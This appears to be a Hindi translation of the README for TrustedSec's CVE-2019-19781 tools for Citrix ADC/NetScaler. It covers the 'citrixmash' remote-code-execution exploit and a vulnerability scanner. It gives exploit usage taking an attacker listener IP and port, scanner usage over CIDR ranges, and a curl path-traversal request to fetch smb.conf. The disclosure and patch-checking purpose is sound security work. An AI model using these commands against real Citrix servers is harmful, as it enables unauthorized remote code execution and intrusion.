
यह Citrix ADC (NetScaler) भेद्यता के लिए प्रकाशित एक उपकरण है। हम इसे केवल इसलिए प्रकट कर रहे हैं क्योंकि अन्य लोगों ने पहले एक्सप्लॉइट कोड प्रकाशित किया है।
इसे केवल इसलिए अपलोड किया गया क्योंकि अन्य शोधकर्ताओं ने अपना कोड पहले प्रकाशित कर दिया था। हम आशा करते थे कि इसे कुछ समय और छिपाकर रखा जा सकता, जब तक कि डिफेंडरों को अपने सिस्टम को पैच करने का उचित समय न मिल जाता।
हम जिम्मेदार प्रकटीकरण के पक्ष में हैं, इस मामले में - बिल्ली पहले ही थैले से बाहर निकल चुकी थी।
एक्सप्लॉइट्स: CVE-2019-19781
root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# python citrixmash.py
Citrixmash v0.1 - एक्सप्लॉइट्स द सिट्रिक्स डायरेक्टरी ट्रैवर्सल बग: CVE-2019-19781 टूल रॉब साइमन और डेव कैनेडी द्वारा लिखा गया योगदान: द TrustedSec टीम वेबसाइट: https://www.trustedsec.com INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ फोरेंसिक्स और IOCS: https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/
यह टूल Citrix ADC (NetScalers) के भीतर एक डायरेक्टरी ट्रैवर्सल बग का फायदा उठाता है, जो एक perl स्क्रिप्ट को कॉल करता है जिसका उपयोग पीड़ित मशीन पर फाइलों को XML प्रारूप में जोड़ने के लिए किया जाता है। यह बदले में रिमोट कोड एक्ज़ीक्यूशन की अनुमति देता है।
इन दो फाइल स्थानों को साफ करना सुनिश्चित करें: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/
ध्यान दें कि victimaddress और attackerip_listener फ़ील्ड में DNS होस्टनाम और IP पते समर्थित हैं।
उपयोग:
python citrixmash.py <attackerip_listener> <attacker_port>
usage: citrixmash.py [-h] target targetport attackerip attackerport
यह जाँचने के लिए एक सरल परीक्षण है कि क्या सर्वर अभी भी CVE-2019-19781 के प्रति संवेदनशील है।
उपयोग: python3 cve-2019-19781.py
ध्यान दें कि आप CIDR नोटेशन जैसे 192.168.1.1/24 और होस्टनाम का भी उपयोग कर सकते हैं।
यह परिणाम देगा कि सर्वर अभी भी संवेदनशील है या नहीं। आप एक बार में केवल एक सर्वर स्कैन कर सकते हैं।
CVE-2019-19781-Scanner कंपनी: TrustedSec डेव कैनेडी द्वारा लिखित यह देखेगा कि क्या रिमोट सिस्टम अभी भी CVE-2019-19781 के प्रति संवेदनशील है। यह एक बार में केवल एक होस्ट को स्कैन करेगा। आप CIDR नोटेशन का भी उपयोग कर सकते हैं, उदाहरण के लिए: 192.168.1.1/24 आप IP पतों के बजाय होस्टनाम का भी उपयोग कर सकते हैं। आप किसी बाहरी टूल द्वारा उत्पन्न IP पतों वाली फ़ाइल का भी उपयोग कर सकते हैं।
उदाहरण: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 उदाहरण2: python3 cve-2019-19781_scanner.py 192.168.1.1 443 उदाहरण3: python3 cve-2019-19781_scanner.py fakewebsiteaddress.com 443 उदाहरण4: python3 cve-2019-19781_scanner.py as15169 443 उदाहरण5: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 verbose उदाहरण6: python3 cve-2019-19781_scanner.py file:hostfile 443
उपयोग: python3 cve-2019-19781_scanner.py targetip targetport
usage: cve-2019-19781_scanner.py [-h] target targetport [verbose]
यदि आप यह परीक्षण करना चाहते हैं कि यह जोखिम कम हुआ है या नहीं, तो निम्न का उपयोग करें:
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
या यदि आप गैर-सार्वजनिक या आंतरिक एंटरप्राइज़ CA का उपयोग कर रहे हैं, तो आप --insecure विकल्प का उपयोग करके इसे ओवरराइड कर सकते हैं
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure
या तो 403 का मतलब है कि आप पैच किए गए हैं या यदि यह एक Citrix वेबसाइट लौटाता है न कि स्वयं smb.conf फ़ाइल।
यदि आप smb.conf देख सकते हैं, तो आप संवेदनशील हैं।
आवश्यकताओं को स्थापित करने के लिए, आपको नीचे दिए गए कमांड को चलाना होगा।
pip3 install -r requirements.txt